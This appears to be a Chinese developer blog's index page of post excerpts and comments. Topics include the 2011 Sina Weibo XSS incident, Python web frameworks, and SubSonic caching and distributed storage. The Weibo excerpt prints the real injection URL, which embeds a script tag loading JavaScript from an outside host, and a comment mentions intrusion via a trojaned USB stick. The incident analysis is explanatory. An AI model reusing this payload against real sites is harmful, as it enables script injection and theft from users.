@testzhangsan
漏洞是无穷无尽的,即便是补上了XSRF的漏洞,那也仅仅是没有XSRF的漏洞而已。
打个比方,要入侵一个公司的内网,最容易的方式可以是去泡前台MM,然后送个有木马的U盘给MM。- @影子明
很显然,/pub/star/g/ 后面的字符串会被新浪内部write过,变成类似:
* http://weibo.com/pub/star.php?g=xyyyd"><script src=//www.2kt.cn/images/t.js></script>?type=update
的玩意,然后star.php竟然会把querystring中g的值直接显示到页面中,相当于 weibo.com 在自己的页面中嵌入了一个来自于 2kt.cn的js脚本。
这种是相当低级的注入攻击 - 昨晚(2011/06/28)新浪微博也出现“黑客”攻击蛮有代表性;网站上流行的XSS( Cross-Site-Script) / XSRF ( Cross-site request forgery )...
- 在各种语言平台中,python涌现的web框架恐怕是最多的;猜想原因应该是在py中构造框架十分简单,使得轮子不断被发明。这里记述一下我了解过的两个py web框架,供大家参考,希望能起他山之石的作用。
- webform的设计争论应该是“月经贴”,但今天跟老赵的这些讨论我觉得还是有些新意。
- select is_banned from users where user_name=XXX相对于select id from users where user_name=XXXselect * f...
- @代码乱了
cache money无法对LessThan(20)这样条件的查询进行透明缓存;需要另外编写代码做显式的缓存。 - 在SubSonic中参考FriendFeed Schema-Less Database design实现数据的分布式存储以及分布式索引查询。解决海量数据的存储/写入/查询问题。
- 为SubSonic添加Vector Cache,实现10倍以上的读性能提高。在web 2.0典型应用场景中,做到0数据库读取,100%命中缓存;数据库仅需要承担写压力。
- @微生物
是,微软平台下的开源项目大都如此。
SubSonic算是发展得不错的了;至少,作者本人被微软招安去了。 - 在公司内部项目实现过程中团队对SubSonic增加了分布式存储,透明对象缓存,透明查询缓存的支持;内部使用了两三年,并且在持续改进中。MoSonic支持海量数据存储,在web 2.0常见场景中其透明缓...
- 原文网址:http://www.blogwind.com/Wuvist/74545.shtml===================================非常搞,等了快一年Discuz!NT...
